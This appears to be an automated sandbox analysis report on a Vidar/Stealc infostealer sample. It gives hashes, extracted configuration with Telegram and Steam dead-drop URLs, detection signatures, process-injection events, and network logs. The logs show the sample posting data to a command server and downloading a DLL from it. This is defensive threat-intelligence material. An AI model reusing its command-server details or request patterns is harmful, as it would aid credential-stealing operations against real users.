Analysis
-
max time kernel
147s -
max time network
150s -
platform
windows11-21h2_x64 -
resource
win11-20240611-en -
resource tags
arch:x64arch:x86image:win11-20240611-enlocale:en-usos:windows11-21h2-x64system -
submitted
13-06-2024 11:55
Static task
static1
Behavioral task
behavioral1
Sample
38d16dccfd335cf95f05ab43376b79a0f6f622a8252cc96b33c68fc5a263f8b8.exe
Resource
win10v2004-20240611-en
General
-
Target
38d16dccfd335cf95f05ab43376b79a0f6f622a8252cc96b33c68fc5a263f8b8.exe
-
Size
2.1MB
-
MD5
c49af08976d8324f556866373969b576
-
SHA1
c4334b02493de064d9d26f5f482d24670bf7c343
-
SHA256
38d16dccfd335cf95f05ab43376b79a0f6f622a8252cc96b33c68fc5a263f8b8
-
SHA512
3d85e000b517e935023dbadb7e86f027e3e280c3b090eab9dea3159e0b38398f32a7bfb0e8a3a7329703b2adaf59b072920cced88a4262338a35473119cf86c2
-
SSDEEP
24576:Ub4m+sws1qLVNMIlJl6DRKbAlcNRfCKFUfMxVVtes12FxwojKr98YGeGG9iO:UZXOjt6DuAwCKFUkxVVChjHZQs
Malware Config
Extracted
stealc
Extracted
vidar
https://t.me/r8z0l
https://steamcommunity.com/profiles/76561199698764354
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Signatures
-
Detect Vidar Stealer 8 IoCs
resource yara_rule behavioral2/memory/4916-1-0x0000000002BB0000-0x0000000002CC0000-memory.dmp family_vidar_v7 behavioral2/memory/4780-4-0x0000000000400000-0x0000000000648000-memory.dmp family_vidar_v7 behavioral2/memory/4780-8-0x0000000000400000-0x0000000000648000-memory.dmp family_vidar_v7 behavioral2/memory/4780-10-0x0000000000400000-0x0000000000648000-memory.dmp family_vidar_v7 behavioral2/memory/4780-13-0x0000000000400000-0x0000000000648000-memory.dmp family_vidar_v7 behavioral2/memory/4780-14-0x0000000000400000-0x0000000000648000-memory.dmp family_vidar_v7 behavioral2/memory/4780-24-0x0000000000400000-0x0000000000648000-memory.dmp family_vidar_v7 behavioral2/memory/4780-25-0x0000000000400000-0x0000000000648000-memory.dmp family_vidar_v7 -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
pid Process 4780 kat3B82.tmp -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4916 set thread context of 4780 4916 38d16dccfd335cf95f05ab43376b79a0f6f622a8252cc96b33c68fc5a263f8b8.exe 81 -
Checks processor information in registry 2 TTPs 1 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString kat3B82.tmp -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4780 kat3B82.tmp 4780 kat3B82.tmp -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 4916 wrote to memory of 4780 4916 38d16dccfd335cf95f05ab43376b79a0f6f622a8252cc96b33c68fc5a263f8b8.exe 81 PID 4916 wrote to memory of 4780 4916 38d16dccfd335cf95f05ab43376b79a0f6f622a8252cc96b33c68fc5a263f8b8.exe 81 PID 4916 wrote to memory of 4780 4916 38d16dccfd335cf95f05ab43376b79a0f6f622a8252cc96b33c68fc5a263f8b8.exe 81 PID 4916 wrote to memory of 4780 4916 38d16dccfd335cf95f05ab43376b79a0f6f622a8252cc96b33c68fc5a263f8b8.exe 81 PID 4916 wrote to memory of 4780 4916 38d16dccfd335cf95f05ab43376b79a0f6f622a8252cc96b33c68fc5a263f8b8.exe 81 PID 4916 wrote to memory of 4780 4916 38d16dccfd335cf95f05ab43376b79a0f6f622a8252cc96b33c68fc5a263f8b8.exe 81 PID 4916 wrote to memory of 4780 4916 38d16dccfd335cf95f05ab43376b79a0f6f622a8252cc96b33c68fc5a263f8b8.exe 81 PID 4916 wrote to memory of 4780 4916 38d16dccfd335cf95f05ab43376b79a0f6f622a8252cc96b33c68fc5a263f8b8.exe 81
Processes
-
C:\Users\Admin\AppData\Local\Temp\38d16dccfd335cf95f05ab43376b79a0f6f622a8252cc96b33c68fc5a263f8b8.exe"C:\Users\Admin\AppData\Local\Temp\38d16dccfd335cf95f05ab43376b79a0f6f622a8252cc96b33c68fc5a263f8b8.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4916 -
C:\Users\Admin\AppData\Local\Temp\kat3B82.tmpC:\Users\Admin\AppData\Local\Temp\kat3B82.tmp2⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4780
-
Network
-
Remote address:8.8.8.8:53Requestt.meIN AResponset.meIN A149.154.167.99
-
Remote address:8.8.8.8:53Requestctldl.windowsupdate.comIN AResponsectldl.windowsupdate.comIN CNAMEctldl.windowsupdate.com.delivery.microsoft.comctldl.windowsupdate.com.delivery.microsoft.comIN CNAMEwu-b-net.trafficmanager.netwu-b-net.trafficmanager.netIN CNAMEdownload.windowsupdate.com.edgesuite.netdownload.windowsupdate.com.edgesuite.netIN CNAMEa767.dspw65.akamai.neta767.dspw65.akamai.netIN A2.17.107.203a767.dspw65.akamai.netIN A2.17.107.138
-
Remote address:8.8.8.8:53Request203.107.17.2.in-addr.arpaIN PTRResponse203.107.17.2.in-addr.arpaIN PTRa2-17-107-203deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request14.227.111.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request13.73.50.20.in-addr.arpaIN PTRResponse
-
Remote address:49.13.235.244:5432RequestGET / HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 49.13.235.244:5432
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Thu, 13 Jun 2024 11:55:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:8.8.8.8:53Request99.167.154.149.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request244.235.13.49.in-addr.arpaIN PTRResponse244.235.13.49.in-addr.arpaIN PTRstatic2442351349clientsyour-serverde
-
Remote address:8.8.8.8:53Requestnexusrules.officeapps.live.comIN AResponsenexusrules.officeapps.live.comIN CNAMEprod.nexusrules.live.com.akadns.netprod.nexusrules.live.com.akadns.netIN A52.111.227.14
-
Remote address:8.8.8.8:53Requestself.events.data.microsoft.comIN AResponseself.events.data.microsoft.comIN CNAMEself-events-data.trafficmanager.netself-events-data.trafficmanager.netIN CNAMEonedscolprdneu10.northeurope.cloudapp.azure.comonedscolprdneu10.northeurope.cloudapp.azure.comIN A20.50.73.13
-
Remote address:49.13.235.244:5432RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----CFHCBKKFIJJJECAAFCGI
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 49.13.235.244:5432
Content-Length: 279
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Thu, 13 Jun 2024 11:55:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:49.13.235.244:5432RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----FCAKFCGCGIEGDGCAAKKJ
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 49.13.235.244:5432
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Thu, 13 Jun 2024 11:55:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:49.13.235.244:5432RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----CAFHDBGHJKFIDHJJJEBK
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 49.13.235.244:5432
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Thu, 13 Jun 2024 11:55:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:49.13.235.244:5432RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----EHJJECBKKECFIEBGCAKJ
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 49.13.235.244:5432
Content-Length: 332
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Thu, 13 Jun 2024 11:55:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:49.13.235.244:5432RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----FCAECAKKFBGCBGDGIEHC
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 49.13.235.244:5432
Content-Length: 4649
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Thu, 13 Jun 2024 11:55:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:49.13.235.244:5432RequestGET /sqls.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 49.13.235.244:5432
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Thu, 13 Jun 2024 11:55:42 GMT
Content-Type: application/octet-stream
Content-Length: 2459136
Last-Modified: Sun, 02 Jun 2024 19:44:54 GMT
Connection: keep-alive
ETag: "665ccbb6-258600"
Accept-Ranges: bytes
-
Remote address:49.13.235.244:5432RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----IJKFHIIEHIEGDHJJJKFI
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 49.13.235.244:5432
Content-Length: 753
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Thu, 13 Jun 2024 11:55:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
1.6kB 19.9kB 25 21
-
1.1kB 2.7kB 11 8
HTTP Request
GET https://49.13.235.244:5432/HTTP Response
200 -
1.4kB 662 B 9 7
HTTP Request
POST https://49.13.235.244:5432/HTTP Response
200 -
1.5kB 2.2kB 10 7
HTTP Request
POST https://49.13.235.244:5432/HTTP Response
200 -
1.6kB 6.3kB 13 10
HTTP Request
POST https://49.13.235.244:5432/HTTP Response
200 -
1.4kB 672 B 9 6
HTTP Request
POST https://49.13.235.244:5432/HTTP Response
200 -
6.0kB 605 B 13 7
HTTP Request
POST https://49.13.235.244:5432/HTTP Response
200 -
91.9kB 2.5MB 1828 1825
HTTP Request
GET https://49.13.235.244:5432/sqls.dllHTTP Response
200 -
1.9kB 528 B 9 5
HTTP Request
POST https://49.13.235.244:5432/HTTP Response
200 -
322 B 7
-
332 B 798 B 5 5
DNS Request
t.me
DNS Response
149.154.167.99
DNS Request
ctldl.windowsupdate.com
DNS Response
2.17.107.2032.17.107.138
DNS Request
203.107.17.2.in-addr.arpa
DNS Request
14.227.111.52.in-addr.arpa
DNS Request
13.73.50.20.in-addr.arpa
-
297 B 635 B 4 4
DNS Request
99.167.154.149.in-addr.arpa
DNS Request
244.235.13.49.in-addr.arpa
DNS Request
nexusrules.officeapps.live.com
DNS Response
52.111.227.14
DNS Request
self.events.data.microsoft.com
DNS Response
20.50.73.13
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
861KB
MD566064dbdb70a5eb15ebf3bf65aba254b
SHA10284fd320f99f62aca800fb1251eff4c31ec4ed7
SHA2566a94dbda2dd1edcff2331061d65e1baf09d4861cc7ba590c5ec754f3ac96a795
SHA512b05c6c09ae7372c381fba591c3cb13a69a2451b9d38da1a95aac89413d7438083475d06796acb5440cd6ec65b030c9fa6cbdaa0d2fe91a926bae6499c360f17f